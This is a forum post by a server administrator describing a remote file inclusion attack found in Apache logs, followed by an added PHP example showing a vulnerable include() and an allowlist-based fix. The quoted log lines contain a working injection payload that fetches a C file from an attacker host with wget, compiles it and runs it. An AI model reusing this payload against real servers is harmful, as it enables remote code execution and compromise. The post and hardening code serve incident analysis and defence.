Server security - experts please comment.

Hello,

I just went through the raw log files of Apache and discovered something 'very interesting'. Actually we include scripts in the main page as a programming practice. But this guy took advantage of this and tried including his stuff.

There are these two entries in my Apache logs
<url>?pagename=http://d-a.newmail.ru/abc.php&cmd=ls
and
<url>?pagename=http://d-a.newmail.ru/abc.php&cmd=cd%20/tmp;wget%20http://d-a.newmail.ru/kalitka.c;gcc%20kalitka.c;./a.out

The 1st entry is of May 1 and the other of May 8. This guy's browser/OS signature is the same for both entries.
Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.01 [ru]

The IPs he has been using are
212.76.160.51 -> could not be traced
200.204.125.170 -> points to Brazil

Now I suppose this guy is from Russia and was using a Brazilian proxy server.

The code which he compiled on the server is located at
http://www.dwcr0up.biz/releases/

He was running a.out, an executable output of this code.

Now my question is to what extent was the machine compromised?

The remedial actions I took were
a) Made PHP safe by using open_basedir and disable_functions.
b) Deleted a.out from /tmp
c) Changed the root password

Is this enough?

Also is there a way to stop including files from external URLs?

K Singh
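The include pattern the post describes, shown beside a hardened form that only ever includes files from a fixed local list, as an added example that is not code from the original post. It assumes PHP 7.1 or later, that the query parameter is `pagename` as in the logged requests, and a hypothetical local directory of includable pages passed in as `$pages_dir`.

```php
<?php
// Added example, not from the original post. Assumes the page-selecting
// parameter is "pagename" (as in the logged requests) and that includable
// pages live under a local directory $pages_dir (hypothetical).

// --- Vulnerable pattern: the raw client value is handed to include().
// With allow_url_fopen on (and allow_url_include on PHP >= 5.2),
// ?pagename=http://host/abc.php makes PHP fetch and execute remote code
// with the web server's privileges, which is what the log entries show.
function render_page_vulnerable(string $pagename): void
{
    include $pagename;   // remote URL, ../ traversal, anything the client sends
}

// --- Hardened pattern: the request only selects a key in a fixed map of
// local files; the parameter value itself never reaches include().
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $pagename, string $pages_dir): ?string
{
    if (!array_key_exists($pagename, PAGES)) {
        return null;                       // unknown key: reject, do not guess
    }
    $path = realpath($pages_dir . DIRECTORY_SEPARATOR . PAGES[$pagename]);
    $base = realpath($pages_dir);
    // Defence in depth: the resolved file must really sit inside $pages_dir.
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_page(string $pagename, string $pages_dir): void
{
    $path = resolve_page($pagename, $pages_dir);
    if ($path === null) {
        http_response_code(404);
        error_log('rejected pagename: ' . $pagename); // visible on log review
        return;
    }
    include $path;
}

render_page($_GET['pagename'] ?? 'home', __DIR__ . '/pages');
```

Alongside the allowlist, set `allow_url_fopen = Off` in php.ini (and `allow_url_include = Off` on PHP 5.2 and later) so that include() cannot fetch remote URLs at all.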
